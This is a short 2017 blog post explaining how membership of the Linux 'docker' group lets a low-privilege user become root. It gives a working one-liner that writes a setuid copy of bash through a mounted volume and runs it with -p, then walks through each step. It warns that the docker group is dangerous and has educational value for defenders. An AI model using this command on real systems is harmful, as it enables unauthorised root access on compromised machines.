One-Liner Linux Privilege Escalation with Docker 1.12.6

I just came up with this on my own, got excited, then saw this this technique has been around for a couple years already, but what the hell? I already wrote the post, so here you go:

A common step during the docker installation process is to add a user to the “docker” group so that they can run containers without sudo-ing. People have warned that this is dangerous. They are correct.

If an attacker pops your box and is on a low priv account BUT that account can run docker containers, the attacker can perform a privilege escalation attack on Linux using docker trivially. Like so:

$ docker run -v /home/${USER}:/h_docs ubuntu bash -c "cp /bin/bash /h_docs/rootshell && chmod 4777 /h_docs/rootshell;" && ~/rootshell -p

Screenshot of Linux Privilege Escalation with Docker


What’s going on here?

When you run a docker container, things run as root INSIDE that container. So the line:

cp /bin/bash /h_docs/rootshell && chmod 4777 /h_docs/rootshell;

is run as root inside the container. So you get a copy of a suid-enabled bash saved into /h_docs INSIDE the container.

/h_docs is of course mapped to a directory on your host file system, so you could find it using docker inspect but to make things easy, we map the volume to our low-priv user’s home directory.

That where this part of the docker run command comes from:

-v /home/${USER}:/h_docs

After the container finished running the command you will find a lovely new suid-enabled, executable file in the home directory called rootshell.

Screenshot of ls -a ~/rootshell

Then bypass the normal suid script blockers by running with the -p flag and you are golden.

Once again:

Screenshot of Linux Privilege Escalation with Docker

Written on April 17, 2017